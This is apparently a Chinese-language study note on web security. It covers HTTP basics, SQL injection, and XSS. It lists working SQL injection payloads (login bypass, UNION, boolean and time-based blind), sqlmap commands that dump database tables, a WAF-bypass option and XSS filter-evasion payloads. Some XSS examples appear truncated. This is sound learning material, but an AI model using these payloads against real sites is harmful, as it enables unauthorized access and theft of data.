网络安全学习笔记1

1：HTTP协议与SQL注入基础
核心知识点
HTTP协议分析
请求方法：GET（参数在URL）、POST（参数在Body）。
关键头字段：
http
Cookie: 身份标识
User-Agent: 客户端类型
Referer: 请求来源
状态码速查：200（成功）、302（重定向）、403（禁止访问）、500（服务器错误）。
SQL注入原理
漏洞触发点：URL参数、表单输入、HTTP头（如User-Agent）。
基础Payload：
sql
' OR 1=1 -- - # 永真条件绕过登录
' UNION SELECT 1,database(),3 -- - # 获取当前数据库名
手工注入步骤：
1.判断注入点（输入'是否报错）。
2.确定字段数（ORDER BY 4）。
3.联合查询获取数据（UNION SELECT）。
2：SQL注入进阶与工具自动化
核心知识点
盲注技术
布尔盲注：
sql
' AND (SELECT SUBSTRING(database(),1,1))='d' -- -
时间盲注：
sql
' AND IF(1=1,SLEEP(5),0) -- -
SQLMap自动化利用
基础命令：
bash
sqlmap -u "http://site.com?id=1" --dbs # 获取数据库列表
sqlmap -u "http://site.com?id=1" -D dvwa --tables # 获取表名
sqlmap -u "http://site.com?id=1" -D dvwa -T users --dump # 导出数据
绕过WAF：
bash
sqlmap --tamper=space2comment # 将空格替换为注释符
3：XSS攻击与绕过技巧
核心知识点
XSS分类与利用
反射型XSS：Payload在URL中，需用户点击触发。
url
http://victim.com/search?q=
存储型XSS：Payload存入数据库（如留言板）。
DOM型XSS：通过修改DOM树触发（无需服务器响应）。
javascript
document.write("");
过滤绕过方法
标签替换：
html

<svg/onload=alert(1)>
运行
编码混淆：
html
click